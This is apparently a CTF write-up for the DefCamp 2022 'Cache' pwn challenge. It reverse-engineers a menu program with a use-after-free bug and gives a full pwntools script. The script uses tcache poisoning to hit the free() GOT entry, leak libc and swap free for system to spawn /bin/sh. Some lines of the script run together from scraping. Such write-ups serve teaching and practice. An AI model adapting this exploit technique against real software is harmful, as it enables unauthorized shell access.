DefCamp 2022 - Cache [Pwn]

Introduction

First Considerations and Patch of the Binary

> pwninit --libc ./libc.so.6 --bin ./vuln
Loader
General information about the program and its security measures

Reverse Engineering

int admin_info()
{
return puts("I am an admin");
}
int getFlag()
{
return execlp("cat", "cat", "flag.txt", 0LL);
}
void main(int argc, const char **argv, const char ** envp)
{
int v3;
void * buf;
void * ptr;
unsigned __int64 v6;
v6 = __readfsqword(0x28 u);
buf = 0 LL;
ptr = 0 LL;
init(argc, argv, envp); while (1)
{
puts("MENU");
puts("1: Make new admin");
puts("2: Make new user");
puts("3: Print admin info");
puts("4: Edit Student Name");
puts("5: Print Student Name");
puts("6: Delete admin");
puts("7: Delete user");
printf("\nChoice: ");
fflush(stdout);
__isoc99_scanf("%d%*c", & v3); switch (v3)
{
case 1:
ptr = malloc(0x10 uLL);
*((_QWORD * ) ptr + 1) = admin_info;
*(_QWORD * ) ptr = getFlag;
break;
case 2:
buf = malloc(0x10 uLL);
printf("What is your name: ");
fflush(stdout);
read(0, buf, 0x10 uLL);
break;
case 3:
( * ((void( ** )(void)) ptr + 1))();
break;
case 4:
printf("What is your name: ");
fflush(stdout);
read(0, buf, 0x10 uLL);
break;
case 5:
if(buf)
printf("Students name is %s\n", (const char * ) buf);
else
puts("New student has not been created yet");
break;
case 6:
free(ptr);
break;
case 7:
free(buf);
break;
default:
puts("bad input");
break;
}
}
}
Author’s joke

Exploitation: General Idea

Representation of how to exploit a t-cache poisoning attack

Exploitation: Implementation

#!/usr/bin/python3from pwn import *HOST = <host>
PORT = <port>
EXE = './vuln_patched'
LIBC = './libc.so.6'
# ------------------------------------------------------------------def make_new_adim():
r.recvuntil(b'Choice: ')
r.sendline(b'1')
def make_new_user(payload):
r.recvuntil(b'Choice: ')
r.sendline(b'2')
r.recvuntil(b'What is your name: ')
r.send(payload)
def print_admin_info():
r.recvuntil(b'Choice: ')
r.sendline(b'3')
def edit_stuendent_name(payload):
r.recvuntil(b'Choice: ')
r.sendline(b'4')
r.recvuntil(b'What is your name: ')
r.send(payload)
def print_student_name():
r.recvuntil(b'Choice: ')
r.sendline(b'5')
def delete_admin():
r.recvuntil(b'Choice: ')
r.sendline(b'6')
def delete_user():
r.recvuntil(b'Choice: ')
r.sendline(b'7')
# ------------------------------------------------------------------if args.R:
r = remote(HOST, PORT)
elif (args.D or args.L):
r = process(EXE)
if args.D:
gdb.attach(r, ''' ''')
input('gdb...')
else:
print('Usage: ./<filename>.py <D | L | R>')
exit()
# ------------------------------------------------------------------libc = ELF(LIBC)
elf = ELF(EXE)
get_flag = 0x40084a
got_free = elf.got['free']
magic_addr = got_free - 0x8
payload = b'A'*0x10
make_new_user(payload)
delete_user()# Code used to discover the joke inside getFlag()
# make_new_adim()
# payload = p64(get_flag)*2
# edit_stuendent_name(payload)
# print_admin_info()
payload = p64(magic_addr)
edit_stuendent_name(payload)
payload = b'A'*0x7 + b'B'
make_new_user(payload)
make_new_user(payload)
print_student_name()
r.recvuntil(b'AB')
libc_free = u64(r.recv(6).ljust(8, b'\x00'))
libc.address = libc_free - libc.symbols['free']
log.info('Libc @ %#x', libc.address)
libc_system = libc.symbols['system']
log.info('System @ %#x', libc_system)
payload = b'/bin/sh\x00' + p64(libc_system)
edit_stuendent_name(payload)
delete_user()r.interactive()
Real Flag

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
WhiteSnake

MSc in CyberSecurity at Politecnico di Milano and eJPT Junior Penetration Tester